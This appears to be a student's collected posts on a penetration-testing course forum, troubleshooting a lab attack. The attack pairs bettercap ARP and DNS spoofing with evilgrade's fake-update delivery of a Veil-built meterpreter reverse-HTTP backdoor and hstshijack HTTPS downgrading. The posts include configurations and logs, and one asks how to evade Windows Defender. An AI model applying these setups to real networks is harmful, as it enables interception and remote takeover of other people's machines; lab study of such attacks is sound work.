Forum Replies Created
- Posts
Hey diego,
Is it this thing?
dns.spoof.address: ‘<interface address>’
dns.spoof.all: ‘true’
dns.spoof.domains: ‘update.speedbit.com’
dns.spoof.hosts: ”regards,
Hey diego,
When i enter the command get dns.spoof in kali, it returns with an error saying sys.log [err] dns.spoof not found, how can i fix this?
thanks
Hey diego,
i was able to send my backdoor to my windows machine and a meterpreter session was created on my linux machine, although I found out that windows didnt allow me to download the backdoor, so I had to manually switch off windows defender, which in obvious cases, isn’t gonna happen in a real life scenario, any suggestions on how i can fix it? Furthermore, im still a bit confused on how to get the results of dns spoof?
Sorry for bothering.
However websites such as stackoverflow.com are displayed as a http connenction when i execute hstshijack/hstshijack command like MR zaid did in the lecture, however other websites such as facebook or youtube still maintained as a https connection, is there any way that i can change it to a http connection?
Hey,
How do I deliver the back-door to my windows machine and what how do I get the result of dns.spoof is it just the lines of code after I run bettercap?
Sorry to bother you.
HTTPSError(‘Invalid HTTPS request form ( expected: absolute, got: relatvie);
was the error shown when i tried to acces speedbit.com like Mr Zaid did in lecture 16.8, everything went back to normal once i closed the services in the kali machine
after running everything again, the dap software on my windows pc was able to detect the update, however when i ran it, no session was created in msfconsole.
and here is the evilgrade configuration:
Name = Download Accelerator
Version = 1.0
Author = [“Francisco Amato < famato +[AT]+ infobytesec.com>”]
Description = “”
VirtualHost = “(update.speedbit.com)”.———————————————————————————————————-.
| Name | Default | Description |
+————-+————————————————-+——————————————+
| title | Critical update | Title name display in the update |
| failsite | http://www.speedbit.com/finishupdate.asp?noupdate=&R=0 | Website display when did’t finish update |
| enable | 1 | Status |
| agent | /var/lib/veil/output/compiled/Pay.exe | Agent to inject |
| endsite | speedbit.com | Website display when finish update |
| description | This critical update fix internal vulnerability | Description display in the update |
‘————-+————————————————-+——————————————‘The ip address of the windows machine is 10.0.2.7 and the mac address of the router (10.0.2.1) did change after i ran the bettercap command, the mac address turned to the same address as the linux machine
Hey diego:
Thanks for replying below is the information youre seeking for!
IFCONFIGeth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe59:fbfa prefixlen 64 scopeid 0x20<link>
ether 08:00:27:59:fb:fa txqueuelen 1000 (Ethernet)
RX packets 6 bytes 900 (900.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 27 bytes 2314 (2.2 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 24 bytes 1356 (1.3 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 24 bytes 1356 (1.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
Configuration for evilgrade:
Payload: go/meterpreter/rev_http selectedRequired Options:
Name Value Description
—- —– ———–
BADMACS FALSE Check for VM based MAC addresses
CLICKTRACK X Require X number of clicks before execution
COMPILE_TO_EXE Y Compile to an executable
CURSORCHECK FALSE Check for mouse movements
DISKSIZE X Check for a minimum number of gigs for hard disk
HOSTNAME X Optional: Required system hostname
INJECT_METHOD Virtual Virtual or Heap
LHOST 10.0.2.15 IP of the Metasploit handler
LPORT 8080 Port of the Metasploit handler
MINPROCS X Minimum number of running processes
PROCCHECK FALSE Check for active VM processes
PROCESSORS 1 Optional: Minimum number of processors
RAMCHECK FALSE Check for at least 3 gigs of RAM
SLEEP 5 Optional: Sleep “Y” seconds, check if accelerated
USERNAME X Optional: The required user account
USERPROMPT FALSE Prompt user prior to injection
UTCCHECK FALSE Check if system uses UTC timeThe result of show options in msfconsole:
Module options (exploit/multi/handler):Name Current Setting Required Description
—- ————— ——– ———–Payload options (windows/meterpreter/reverse_http):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique (Accepted: ”, seh, thread, process, none)
LHOST 10.0.2.15 yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP PathExploit target:
Id Name
— —-
0 Wildcard Target
bettercap’s version and command used to start it:
root@kali:~# bettercap -iface eth0 -caplet /root/spoof.cap
bettercap v2.23 (built for linux amd64 with go1.11.6) [type ‘help’ for a list of commands][00:26:15] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
[00:26:15] [endpoint.new] endpoint 10.0.2.3 detected as 08:00:27:b5:47:34 (PCS Computer Systems GmbH).
[00:26:15] [sys.log] [inf] arp.spoof enabling forwarding
[00:26:15] [sys.log] [war] arp.spoof full duplex spoofing enabled, if the router has ARP spoofing mechanisms, the attack will fail.
[00:26:15] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.The contents of the arp spoof caplet.
net.probe on
set arp.spoof.fullduplex true
set arp.spoof.targets 10.0.2.7
arp.spoof on
set net.sniff.local true
net.sniff onIm a bit confused on how to get dns.spoof?
Similar problem also occured in 16.7 everything worked fine until i clicked ‘update now’ in DAP client, where it would display an error of ‘Discovered an error in the component list’ and stopped me going any further. Please help
Also, i when i try to access other websites an error of HTTPerror(‘invalid http request form’ expected absolute, got relative) would occur
